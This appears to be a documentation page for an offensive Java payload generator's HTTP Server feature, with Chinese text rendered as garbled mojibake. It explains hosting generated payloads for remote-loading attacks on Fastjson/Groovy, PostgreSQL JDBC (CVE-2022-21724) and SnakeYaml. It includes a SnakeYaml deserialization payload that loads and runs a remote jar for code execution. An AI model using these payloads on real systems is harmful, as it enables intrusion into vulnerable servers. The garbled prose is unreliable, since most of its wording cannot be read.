--- sidebar_position: 6 --- # HTTP Server ä¸ä¸ªç®åçHTTP Serverï¼å¯ä»¥å°çæç Payload æè½½å°HTTP端å£ä¸ï¼æ¹ä¾¿æäº HTTP URL çåè¿åºæ¯ã ## Fastjson Groovy è¿ç¨å è½½ Gadgetåï¼`GroovyJarConvert` ä½¿ç¨ HTTP Server å¹¶å¼å¯å¯¹åº HTTP 端å£ï¼éæ© OtherPayload å¨çº§èéæ©å¨ä¸å¾é GroovyJarConvertï¼æ¤ Gadget ä¼å°åèç å¤ç为 Groovy Jar Payload æ ¼å¼ï¼ä¹å°±æ¯Jarå ï¼ç¶åéè¿ HTTP Server æå¨å°ä¸ä¸ª HTTP 端å£ä¸ï¼ç¹å»çæåä¼çæä¸ä¸ª HTTP 龿¥ï¼æ¾å° fastjson groovy payload ä¸å³å¯ä½¿ç¨  ## PostgreSQL JDBC çå©ç¨ å¯éç Gadgetï¼ - `SpringBeanXmlClassLoader` - `SpringBeanXmlExec` - `SpringBeanXmlSpEL` PostgreSQL (CVE-2022-21724) é å SpringBean è¿ç¨å è½½XMLæä»¶ï¼æ§è¡åèç å¹¶åæ¾   om/LandGrey/spring-boot-upload-file-lead-to-rce-tricks ## SnakeYaml Jar è¿ç¨å è½½ Gadget åï¼`SnakeyamlJarConvert` çæè¿ç¨ä¸ä¸é¢ç±»ä¼¼ï¼ä¸åè¿å¤éè¿° é常é åå¦ä¸ SnakeYaml Payloadï¼å®ç°è¿ç¨å è½½ RCE ```yaml !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [ [ !!java.net.URL [ "http://127.0.0.1:7777/yaml-payload.jar" ] ] ] ] ``` åèï¼ - https://tttang.com/archive/1815/#toc_snakeyaml_1 - https://github.com/artsploit/yaml-payload